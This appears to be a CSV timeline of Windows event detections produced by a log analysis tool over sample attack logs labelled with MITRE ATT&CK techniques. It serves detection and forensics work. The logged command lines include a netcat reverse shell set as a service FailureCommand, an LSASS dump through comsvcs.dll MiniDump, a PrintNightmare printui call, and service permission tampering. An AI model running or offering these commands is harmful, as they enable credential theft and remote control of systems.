2021-10-08 03:21:37.146 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
2021-10-08 03:30:51.237 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
2021-10-08 03:30:51.247 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name FailureCommand -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
2021-10-08 03:30:51.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""FailureCommand"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
2021-10-08 03:30:51.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
2021-10-08 03:30:51.266 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
2021-10-08 03:30:51.269 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx
2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx
2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
2021-10-08 19:05:36.298 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
